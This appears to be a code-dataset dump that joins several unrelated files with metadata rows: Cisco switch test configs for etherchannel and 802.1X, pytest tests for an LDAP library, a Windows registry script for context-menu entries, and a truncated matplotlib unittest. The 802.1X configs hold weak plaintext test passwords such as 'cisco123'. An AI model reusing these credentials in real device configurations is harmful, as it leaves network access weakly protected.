'default interface GigabitEthernet1/0/3\n'\
'no vlan 11\n'\
'no interface vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
}
},
'uut': {
'1': {
'config': 'no vlan 11\n'\
'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'spanning-tree vlan 11\n'\
'no interface Vlan11\n'\
'no interface Po10\n'\
'interface Vlan11\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface vlan11\n'\
'no vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 40
}
}
}
}
# Config/unconfig CLI sequences for the PAgP etherchannel ping test:
# helper bundles three access ports into Port-channel10
# ("desirable non-silent"); UUT configures plain access ports on vlan 11.
Etherchannel_PAGP_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'!\n'\
'interface Vlan11\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'no vlan 11\n'\
'no interface vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
}
},
'uut': {
'1': {
'config': 'no vlan 11\n'\
'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'interface Vlan11\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface vlan11\n'\
'no vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 30
}
}
}
}
# Config/unconfig CLI sequences for the layer-3 (routed, 'no switchport')
# etherchannel ping test; both sides address Port-channel10 directly.
L3_Etherchannel_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'interface Po10\n'\
'no switchport\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'no interface Port-channel10',
}
},
'uut': {
'1': {
'config': 'spanning-tree mode rapid-pvst\n'\
'!\n'\
'default interface Port-channel10\n'\
'interface Port-channel10\n'\
'no switchport\n'\
'no shut\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'!\n'\
'default interface GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 30
}
}
}
}
# Base dot1x (802.1X) authenticator configuration shared by the UUT-side
# test cases: vlans 1/20, AAA local auth, an MD5 EAP profile, and local
# supplicant credentials. Implicit string concatenation inside parentheses
# replaces the original backslash line continuations.
dot1x_base_uut = (
    'interface vlan 1\n'
    '!name default\n'
    '!\n'
    'interface vlan 20\n'
    '!name nondefault\n'
    '!\n'
    'dot1x system-auth-control\n'
    '!\n'
    'interface GigabitEthernet1/0/15\n'
    'shut\n'
    'interface vlan1\n'
    'no ip address\n'
    'interface vlan20\n'
    'no ip address\n'
    'no shut\n'
    'policy-map type control subscriber dummy\n'
    '!\n'
    'no policy-map type control subscriber dummy\n'
    '!\n'
    'aaa new-model\n'
    'aaa session-id common\n'
    'aaa authentication dot1x default local\n'
    'aaa authorization network default local\n'
    'aaa local authentication default authorization default\n'
    'aaa authorization credential-download default local\n'
    '!\n'
    'eap profile EAP-METH\n'
    'method md5\n'
    '!\n'
    'interface GigabitEthernet1/0/15\n'
    'dot1x authenticator eap profile EAP-METH\n'
    'username switch password 0 cisco123\n'
    'username switch4 password 0 cisco123'
)
# Base dot1x configuration shared by the helper-side test cases: global
# dot1x/supplicant settings plus a set of named credential blocks
# (switch1..switch4, user1/user2, and a deliberately wrong one).
# Implicit string concatenation replaces backslash line continuations.
dot1x_base_helper = (
    'line con 0\n'
    'exec-timeout 0 0\n'
    '!\n'
    'ip routing\n'
    'ip domain-name cisco\n'
    'cdp run\n'
    'dot1x system-auth-control\n'
    'dot1x supplicant force-multicast\n'
    '!\n'
    'ip vrf ABCD\n'
    '!\n'
    'eap profile EAP-METH\n'
    'method md5\n'
    '!\n'
    'dot1x credentials switch1\n'
    'username switch\n'
    'password 0 cisco123\n'
    '!\n'
    'dot1x credentials switch2\n'
    'username switch2\n'
    'password 0 cisco123\n'
    '!\n'
    'dot1x credentials switch3\n'
    'username switch3\n'
    'password 0 cisco123\n'
    '!\n'
    'dot1x credentials switch4\n'
    'username switch4\n'
    'password 0 cisco123\n'
    '!\n'
    'dot1x credentials user1\n'
    'username user1\n'
    'password 0 cisco\n'
    '!\n'
    'dot1x credentials user2\n'
    'username aaaaa\n'
    'password 0 cisco\n'
    '!\n'
    '!\n'
    'dot1x credentials wrong\n'
    'username wrong\n'
    'password 0 wrong'
)
# Config/unconfig CLI sequences for the dot1x EAP session test on the
# default vlan (vlan 1): UUT is the authenticator on Gi1/0/15, helper is
# the supplicant on Gi1/0/1 using the 'switch1' credentials.
dot1xeapsessiondefaultvlan = {
'devices': {
'uut': {
'1': {
'config': dot1x_base_uut,
'unconfig': 'no interface vlan20\n'\
'default interface vlan1\n'\
'no dot1x system-auth-control\n'\
'default interface GigabitEthernet1/0/15\n'\
'no aaa authentication dot1x default local\n'\
'no aaa authorization network default local\n'\
'no aaa authorization credential-download default local\n'\
'no username switch\n'\
'no username switch4\n'\
'no eap profile EAP-METH\n'\
'no parameter-map type webauth global\n'\
'no policy-map type control subscriber DOT1X\n'\
'no service-template DEFAULT_CRITICAL_VOICE_TEMPLATE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_MUST_SECURE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_SHOULD_SECURE\n'\
'no service-template webauth-global-inactive\n'\
'no aaa local authentication default authorization default\n'\
'no aaa new-model',
},
'2': {
'config': 'interface GigabitEthernet1/0/15\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'policy-map type control subscriber DOT1X\n'\
'event session-started match-all\n'\
'1 class always do-until-failure\n'\
'1 authenticate using dot1x\n'\
'interface GigabitEthernet1/0/15\n'\
'no shut\n'\
'switchport\n'\
'switchport mode access\n'\
'switchport access vlan 1\n'\
'no access-session closed\n'\
'no switchport port-security\n'\
'access-session port-control auto\n'\
'access-session host-mode multi-auth\n'\
'dot1x pae authenticator\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'service-policy type control subscriber DOT1X\n'\
'interface vlan1\n'\
'!no switchport\n'\
'ip address 1.1.1.2 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'no policy-map type control subscriber DOT1X\n'\
'default interface vlan 1',
'sleep': 45
}
},
'helper': {
'1': {
'config': dot1x_base_helper,
'unconfig': 'no dot1x system-auth-control\n'\
'no dot1x supplicant force-multicast\n'\
'!\n'\
'no eap profile EAP-METH\n'\
'!\n'\
'no dot1x credentials switch\n'\
'!\n'\
'default interface GigabitEthernet1/0/1\n'\
'no dot1x credentials switch1\n'\
'no dot1x credentials switch2\n'\
'no dot1x credentials switch3\n'\
'no dot1x credentials switch4\n'\
'no dot1x credentials user1\n'\
'no dot1x credentials user2\n'\
'no ip vrf ABCD\n'\
'no ip domain-name cisco\n'\
'no dot1x credentials wrong',
},
'2': {
'config': 'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'dot1x pae supplicant\n'\
'dot1x credentials switch1\n'\
'dot1x supplicant eap profile EAP-METH\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1',
}
}
}
}
# Config/unconfig CLI sequences for the dot1x wrong-user test. Unlike the
# default-vlan case, the interface names are parameterized: the {name} and
# {peer_intf} placeholders are presumably filled in (str.format-style) from
# the 'name'/'peer_intf' keys below — confirm against the test runner.
dot1xeapsessionWrongUser = {
'devices': {
'uut': {
'peer': 'helper',
'name': 'GigabitEthernet1/0/15',
'peer_intf': 'GigabitEthernet1/0/1',
'1': {
'config': dot1x_base_uut,
'unconfig': 'no interface vlan20\n'\
'default interface vlan1\n'\
'no dot1x system-auth-control\n'\
'default interface {name}\n'\
'no aaa authentication dot1x default local\n'\
'no aaa authorization network default local\n'\
'no aaa authorization credential-download default local\n'\
'no username switch\n'\
'no username switch4\n'\
'no eap profile EAP-METH\n'\
'no parameter-map type webauth global\n'\
'no policy-map type control subscriber DOT1X\n'\
'no service-template DEFAULT_CRITICAL_VOICE_TEMPLATE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_MUST_SECURE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_SHOULD_SECURE\n'\
'no service-template webauth-global-inactive\n'\
'no aaa local authentication default authorization default\n'\
'no aaa new-model',
},
'2': {
'config': 'interface {name}\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'policy-map type control subscriber DOT1X\n'\
'event session-started match-all\n'\
'1 class always do-until-failure\n'\
'1 authenticate using dot1x\n'\
'interface {name}\n'\
'no shut\n'\
'switchport\n'\
'switchport mode access\n'\
'switchport access vlan 20\n'\
'access-session closed\n'\
'no switchport port-security\n'\
'access-session port-control auto\n'\
'access-session host-mode single-host\n'\
'dot1x pae authenticator\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'service-policy type control subscriber DOT1X',
'unconfig': 'default interface {name}\n'\
'no policy-map type control subscriber DOT1X\n'\
'no vlan 20\n'\
'no interface vlan 20',
'sleep': 45
}
},
'helper': {
'1': {
'config': dot1x_base_helper,
'unconfig': 'no dot1x system-auth-control\n'\
'no dot1x supplicant force-multicast\n'\
'!\n'\
'no eap profile EAP-METH\n'\
'!\n'\
'no dot1x credentials switch\n'\
'!\n'\
'default interface {peer_intf}\n'\
'no dot1x credentials switch1\n'\
'no dot1x credentials switch2\n'\
'no dot1x credentials switch3\n'\
'no dot1x credentials switch4\n'\
'no dot1x credentials user1\n'\
'no dot1x credentials user2\n'\
'no ip vrf ABCD\n'\
'no ip domain-name cisco\n'\
'no dot1x credentials wrong',
},
'2': {
'config': 'interface {peer_intf}\n'\
'no switchport\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'dot1x pae supplicant\n'\
'dot1x credentials switch1\n'\
'dot1x supplicant eap profile EAP-METH\n'\
'no shut',
'unconfig': 'default interface {peer_intf}',
}
}
}
}
| 48.220827
| 108
| 0.36299
| 5,318
| 65,291
| 4.433998
| 0.04419
| 0.034733
| 0.232655
| 0.202926
| 0.940331
| 0.914673
| 0.867981
| 0.846141
| 0.832909
| 0.813316
| 0
| 0.075754
| 0.542663
| 65,291
| 1,353
| 109
| 48.256467
| 0.713932
| 0.000092
| 0
| 0.779789
| 0
| 0.004525
| 0.411256
| 0.091157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.00905
| 0.003017
| 0
| 0.022624
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
214a7ac0321b88a7173e6413e3477a6a9497ff1a
| 7,949
|
py
|
Python
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | 1
|
2021-09-23T14:39:36.000Z
|
2021-09-23T14:39:36.000Z
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | 38
|
2020-08-31T22:53:09.000Z
|
2022-03-28T20:55:39.000Z
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | null | null | null |
import pytest
from krs import ldap
from ..util import ldap_bootstrap
def test_get_users_none(ldap_bootstrap):
    """Looking up a user that was never created raises KeyError."""
    with pytest.raises(KeyError):
        ldap_bootstrap.get_user('foo')
def test_list_users_none(ldap_bootstrap):
    """An empty directory lists no users."""
    assert not ldap_bootstrap.list_users()
def test_create_user(ldap_bootstrap):
    """A created user can be fetched back with all attributes intact."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    user = ldap_bootstrap.get_user('foo')
    for attr, expected in (('uid', 'foo'), ('givenName', 'foo'), ('sn', 'bar'), ('mail', 'foo@bar')):
        assert user[attr] == expected
def test_list_users(ldap_bootstrap):
    """list_users returns every created user keyed by username."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    users = ldap_bootstrap.list_users()
    assert len(users) == 1
    assert 'foo' in users
    user = users['foo']
    for attr, expected in (('uid', 'foo'), ('givenName', 'foo'), ('sn', 'bar'), ('mail', 'foo@bar')):
        assert user[attr] == expected
def test_list_users_attrs(ldap_bootstrap):
    """Requesting specific attributes limits what list_users returns."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    users = ldap_bootstrap.list_users(['sn'])
    assert len(users) == 1
    assert 'foo' in users
    # only the requested attribute comes back; uid is filtered out
    assert users['foo']['sn'] == 'bar'
    assert 'uid' not in users['foo']
def test_create_user_fail(ldap_bootstrap):
    """A create_user call missing a required field must not create the user."""
    with pytest.raises(Exception):
        ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar')
    with pytest.raises(KeyError):
        ldap_bootstrap.get_user('foo')
def test_modify_user_class(ldap_bootstrap):
    """Adding an objectClass along with its required attributes succeeds."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    posix_attrs = {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}
    ldap_bootstrap.modify_user('foo', posix_attrs, objectClass='posixAccount')
    user = ldap_bootstrap.get_user('foo')
    assert user['gidNumber'] == 1234
    assert 'posixAccount' in user['objectClass']
def test_modify_user_remove_class(ldap_bootstrap):
    """Removing an objectClass together with its attributes leaves a clean entry."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}, objectClass='posixAccount')
    # clearing the posix attributes (None) allows the class to be dropped
    cleared = {attr: None for attr in ('gidNumber', 'uidNumber', 'homeDirectory')}
    ldap_bootstrap.modify_user('foo', cleared, removeObjectClass='posixAccount')
    user = ldap_bootstrap.get_user('foo')
    assert 'gidNumber' not in user
    assert 'posixAccount' not in user['objectClass']
def test_modify_user_attrs(ldap_bootstrap):
    """Plain attribute modification updates the stored value."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.modify_user('foo', {'givenName': 'foofoo'})
    assert ldap_bootstrap.get_user('foo')['givenName'] == 'foofoo'
def test_modify_user_fail(ldap_bootstrap):
    """Invalid modifications must fail atomically, leaving the entry unchanged."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    with pytest.raises(Exception):
        # missing homeDirectory for posixAccount
        ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234}, objectClass='posixAccount')
    ret = ldap_bootstrap.get_user('foo')
    assert 'gidNumber' not in ret
    with pytest.raises(Exception):
        # cannot add field gidNumber with current objectClasses
        ldap_bootstrap.modify_user('foo', {'gidNumber': 1234})
    ret = ldap_bootstrap.get_user('foo')
    assert 'gidNumber' not in ret
    # a valid add, so the removal below has something to fail against
    ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}, objectClass='posixAccount')
    with pytest.raises(Exception):
        # cannot remove objectClass without removing attrs
        ldap_bootstrap.modify_user('foo', removeObjectClass='posixAccount')
def test_create_group(ldap_bootstrap):
    """A newly created group shows up in list_groups."""
    ldap_bootstrap.create_group('foo')
    assert list(ldap_bootstrap.list_groups().keys()) == ['foo']
def test_list_group(ldap_bootstrap):
    """An empty directory lists no groups."""
    assert list(ldap_bootstrap.list_groups().keys()) == []
def test_add_user_group(ldap_bootstrap):
    """Adding a user to a group records a member DN for that uid."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    assert any(dn.startswith('uid=foo,') for dn in groups['foo']['member'])
def test_add_user_group_twice(ldap_bootstrap):
    """Adding the same user twice must not duplicate the membership."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    matches = [dn for dn in groups['foo']['member'] if dn.startswith('uid=foo,')]
    assert len(matches) == 1
def test_remove_user_group(ldap_bootstrap):
    """Removing a user from a group drops their member DN."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    print(groups)  # aid debugging on failure
    assert all(not dn.startswith('uid=foo,') for dn in groups['foo']['member'])
def test_remove_user_group_twice(ldap_bootstrap):
    """A second removal of the same user is a harmless no-op."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    print(groups)  # aid debugging on failure
    assert all(not dn.startswith('uid=foo,') for dn in groups['foo']['member'])
def test_create_group_posix(ldap_bootstrap):
    """Groups can be created with a gidNumber (posix group)."""
    ldap_bootstrap.create_group('foo', gidNumber=1000)
    assert list(ldap_bootstrap.list_groups().keys()) == ['foo']
def test_add_user_group_posix(ldap_bootstrap):
    """Posix group membership is tracked via memberUid."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo', gidNumber=1000)
    ldap_bootstrap.add_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    assert 'foo' in groups['foo']['memberUid']
def test_add_user_group_posix_twice(ldap_bootstrap):
    """Re-adding a posix member must not duplicate the memberUid entry."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo', gidNumber=1000)
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.add_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    print(groups)  # aid debugging on failure
    assert list(groups.keys()) == ['foo']
    member_uid = groups['foo']['memberUid']
    if isinstance(member_uid, str):
        # single-valued attribute collapses to a bare string
        assert 'foo' in member_uid
    else:
        assert len([uid for uid in member_uid if uid == 'foo']) == 1
def test_remove_user_group_posix(ldap_bootstrap):
    """Removing a posix member clears their memberUid entry."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo', gidNumber=1000)
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    print(groups)  # aid debugging on failure
    group = groups['foo']
    assert 'memberUid' not in group or 'foo' not in group['memberUid']
def test_remove_user_group_posix_twice(ldap_bootstrap):
    """A second posix removal is a harmless no-op."""
    ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
    ldap_bootstrap.create_group('foo', gidNumber=1000)
    ldap_bootstrap.add_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    ldap_bootstrap.remove_user_group('foo', 'foo')
    groups = ldap_bootstrap.list_groups()
    assert list(groups.keys()) == ['foo']
    print(groups)  # aid debugging on failure
    group = groups['foo']
    assert 'memberUid' not in group or 'foo' not in group['memberUid']
| 40.556122
| 135
| 0.699711
| 1,062
| 7,949
| 5.001883
| 0.070621
| 0.230045
| 0.092997
| 0.083208
| 0.872741
| 0.840926
| 0.802146
| 0.744917
| 0.734187
| 0.698795
| 0
| 0.009668
| 0.14115
| 7,949
| 195
| 136
| 40.764103
| 0.76842
| 0.017738
| 0
| 0.668874
| 0
| 0
| 0.140441
| 0
| 0
| 0
| 0
| 0
| 0.278146
| 1
| 0.139073
| false
| 0
| 0.019868
| 0
| 0.15894
| 0.033113
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d3f6e1be907a46c751b69c28887f3d5795c685b
| 1,147
|
py
|
Python
|
tools/code_helper/register.py
|
tkgamegroup/flame
|
f1628100cc66e13f84ea3047ea33af019caeb01b
|
[
"MIT"
] | 25
|
2018-02-28T05:59:50.000Z
|
2022-03-18T03:11:52.000Z
|
tools/code_helper/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | null | null | null |
tools/code_helper/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | 5
|
2018-05-17T04:16:30.000Z
|
2021-12-22T04:02:02.000Z
|
import os

# Register Windows Explorer context-menu entries (right-click on a folder
# background) that launch code_helper.exe with the matching template command.
flame_path = os.environ["FLAME_PATH"]
_bin_dir = flame_path + "\\bin\\debug"

# (registry key name, menu label, code_helper -cmd argument)
_entries = [
    ("NewComponentTemplate", "New Component Template", "new_component_template"),
    ("NewSystemTemplate", "New System Template", "new_system_template"),
    ("NewGeneralTemplate", "New General Template", "new_general_template"),
]

for _key, _label, _cmd in _entries:
    _base = "reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\" + _key
    os.system(_base + " /VE /F /D \"" + _label + "\"")
    os.system(_base + "\\Command /VE /F /D \"" + _bin_dir + "\\code_helper.exe -cmd " + _cmd + "\"")

# Have not found a good way to add this by code
print("You can add this tool to visual studio's external tools, use \"-path $(ItemPath)\" as parameter")
| 88.230769
| 194
| 0.742807
| 168
| 1,147
| 4.922619
| 0.321429
| 0.058041
| 0.079807
| 0.101572
| 0.749698
| 0.719468
| 0.719468
| 0.719468
| 0.719468
| 0.719468
| 0
| 0
| 0.088928
| 1,147
| 12
| 195
| 95.583333
| 0.790431
| 0.034002
| 0
| 0
| 0
| 0
| 0.608145
| 0.390045
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.111111
| null | null | 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4b072c837e805507bb2d7182b2e6443665ff5a5
| 17,760
|
py
|
Python
|
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | 16
|
2017-04-14T00:27:45.000Z
|
2021-04-28T10:59:28.000Z
|
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | null | null | null |
mpl_animationmanager/test/test_based_on_examples.py
|
luchko/mpl_animation-manager
|
04405c8c73b72cbfbe0f39a0dbe7a90172b3a5cb
|
[
"MIT"
] | 2
|
2018-05-16T10:02:47.000Z
|
2020-07-09T02:33:57.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Unittest of the Matplotlib animation manager basic functionality.

Unittests are strongly bound to the example modules and the AnimationManager
class itself, which supports TestCase running.

A unittest should be run by passing the TestCase to a manager instance (mng)
via the mng.runUnitTest(MyTestCase) method.

The TestCase gets access to the figure axes and the manager dialog during
TestCase instance creation via the __init__ method.

You might want to decrease the DELAY constant for signal processing in the
main loop in order to make tests run faster. You might also want to increase
DELAY in case tests fail due to a large delay while slots are processed.
"""
__author__ = "Ivan Luchko (luchko.ivan@gmail.com)"
__version__ = "1.0a1"
__date__ = "Apr 4, 2017"
__copyright__ = "Copyright (c) 2017, Ivan Luchko and Project Contributors "
import os
import time
import unittest
# example animations that the manager-under-test is driven with
from mpl_animationmanager.examples import oscillation_2D
from mpl_animationmanager.examples import rot_graph_3D
from mpl_animationmanager.examples import modif_wireframe_3D
from mpl_animationmanager.examples import modif_randwalk_3D
# directory where exported test animations are written (and then removed)
test_folder = "./mpl_animationmanager/test/"
DELAY = 0.5 # [sec] delay for signal processing in the main loop
def isRotated(ax, dlg):
    '''
    Return True if the 3D axes' azimuth changed within ~one animation frame.

    Must be executed in a separate thread: it sleeps slightly longer than one
    frame period (1.1/fps) while the main thread runs the animation.
    '''
    azim_before = ax.azim
    time.sleep(1.1 / dlg.fps)
    return ax.azim != azim_before
class modif_oscillation_2D_Test(unittest.TestCase):
    '''Animation manager test based on the '2D oscillation' example.

    Constructed with the figure axes and the manager dialog so each test
    can drive the dialog widgets directly.
    '''
    def __init__(self, testname, ax, dlg):
        unittest.TestCase.__init__(self, testname)
        # keep references to the axes, dialog and parent figure
        self.ax, self.dlg = ax, dlg
        self.fig = self.ax.get_figure()
        # shorten the modification period so tests run faster
        self.dlg.spinBox_period_modif.setValue(5)
    def test_initialization(self):
        '''
        test widget components according to type of figure and animation
        - 2D/3D axes
        - object modification present
        '''
        # current example has modification
        self.assertTrue(self.dlg.widget_modif.isVisible())
        self.assertTrue(self.dlg.checkBox_modif.isChecked())
        # current example axes are 2D, so rotation controls are hidden/unchecked
        self.assertTrue(not self.dlg.widget_rot.isVisible())
